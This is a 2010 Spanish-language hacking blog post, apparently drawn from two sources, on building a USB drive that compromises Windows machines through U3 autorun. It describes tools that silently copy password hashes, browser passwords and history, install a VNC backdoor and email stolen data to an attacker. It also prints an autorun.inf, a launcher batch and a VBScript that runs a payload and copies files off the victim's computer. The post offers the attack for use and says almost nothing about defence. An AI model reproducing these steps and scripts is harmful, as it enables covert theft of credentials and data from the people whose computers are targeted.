15 jun 2010

Cómo crear un USB Drive (Pendrive) Auto-Hacking

Bueno, primero les pongo un texto introductorio a los "Ataques USB con tecnología U3" y luego un video de como crear un buen Pendrive (USB Drive) para comprometer el sistema mediante un autorun.inf.

Ataques USB con tecnología U3
Introducción

A continuación se describen los diversos ataques que se pueden llevar a cabo mediante dispositivos de almacenamiento USB U3. Estos ataques consisten en la mayoría de casos, en el robo de información del ordenador donde se conecta el dispositivo USB, pero también es posible la instalación de puertas traseras con la finalidad de tomar un mayor control sobre el ordenador.

La vulnerabilidad

El ataque es posible realizarlo debido a la opción Autorun que hasta Windows XP SP3 permanecía activada por defecto. Dicha opción habilita al Sistema Operativo a ejecutar sentencias y programas automáticamente una vez se ha introducido el CD/DVD en el ordenador. El Sistema Operativo lee el fichero Autorun.inf contenido en el directorio raíz del CD/DVD donde se especifica qué ejecutar. De esta manera, por ejemplo, sería posible instalar programas que registren las pulsaciones introducidas en el ordenador y posteriormente enviarlas por correo electrónico.

El ataque

Los dispositivos con tecnología U3 contienen una partición que simula ser una unidad de CD-ROM virtual. Este tipo de dispositivos permiten la ejecución de programas directamente desde el dispositivo, sin necesidad de instalación en el equipo al que se conecta. Así pues, además de contener la unidad de CD-ROM virtual que normalmente suele ser bastante pequeña en tamaño, contiene una partición mayor donde se almacenan las aplicaciones a ejecutar.

Dicho esto, la característica que se va a aprovechar es la de auto ejecución al insertar un CD-ROM, que en nuestro caso se tratará del dispositivo USB con la unidad virtual. Como se ha explicado antes, esta opción se encuentra activada por defecto en las versiones del Sistema Operativo Windows anteriores a la versión XP SP2 y permite la ejecución de las sentencias que se especifiquen en el fichero Autorun.inf, cosa que hará innecesaria la actuación del usuario para la ejecución de cualquier sentencia o programa en el equipo.

Herramientas disponibles

Para llevar a cabo el ataque, lo primero que se debe hacer es modificar el contenido de la unidad de CD-ROM virtual con la finalidad de que ejecute lo que nosotros queramos. Esto se puede llevar a cabo mediante una serie de herramientas disponibles las cuales se describirán a continuación:

- Universal U3 LaunchPad Hacker: Esta herramienta nos permite reemplazar el contenido de la unidad de CD-ROM virtual por una imagen ISO personalizada por nosotros con aplicaciones destinadas al Slurping o robo de información. Cabe destacar que en la otra partición del disco duro, en la que es posible la escritura, se crea de manera oculta un directorio con los datos del programa.

- SwitchBlade: Utiliza herramientas conocidas como pwdump, mailpassview entre otras para el robo de información.

Una vez es conectado el dispositivo USB a un equipo típico con Windows XP SP2 o anterior, en aproximadamente 30 segundos el programa habrá copiado al dispositivo datos sensibles del sistema como por ejemplo claves de registro de productos de Microsoft, lista de parches de seguridad instalados, hashes de contraseñas SAM, contraseñas almacenadas en la caché del equipo, contraseñas almacenadas en navegadores web, historial de navegación, etc.

- Hacksaw: Este payload es similar al anterior pero añade algunas funciones más interesantes como:

a) Instala en el sistema un programa que se inicia automáticamente al iniciar el Sistema Operativo el cual se encarga de recopilar datos sensibles como contraseñas, caché, historiales, etc., comprimirla y enviarla a un dirección de correo electrónico configurada por el atacante.

b) Instala una herramienta de escritorio remoto llamada VNC, que permite al atacante administrar remotamente el equipo.

c) Ejecuta un escaneo de la red local a la que el equipo está conectado obteniendo un mapa de red que se enviará por correo electrónico al atacante.

Fuente: http://stefan.diosdelared.com/

[Video] Como crear un USB Drive (Pendrive) Auto-Hacking


This video will show you how to make an auto-hacking USB drive and how to protect yourself from them.

U3 Universal customizer - http://www.u3community.com/viewtopic.php?t=434
Batch to exe converter - http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
Nirsoft Utilities - http://www.nirsoft.net

AUTORUN SCRIPT:
[Autorun]
open=launch.exe -a
LAUNCH.BAT SCRIPT:
usb.vbs
USB.VBS SCRIPT:
Dim oFSO, oDrive, objFolder, oDestination, shell
Const USBDRIVE=1
oDestination = “c:test”
set oFSO = Wscript.CreateObject(“Scripting.FileSystemObject”)
Set shell=createobject(“wscript.shell”)
For Each oDrive in oFSO.Drives
If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter <> “A”  Then
shell.run oDrive.DriveLetter & “:batch.bat”
set shell=nothing
End If
Next
Sub CopyFiles(oPath, oDst)
Set objFolder = oFSO.GetFolder(oPath)
For Each Files In objFolder.Files
WScript.Echo “Copying File”,Files
newDst=oDst&”"&Files.Name
oFSO.CopyFile Files,newDst,True
WScript.Echo Err.Description
Next
End Sub

Fuente: http://www.tinkernut.com/

Author & Editor

Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.

1 Notaciones:

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.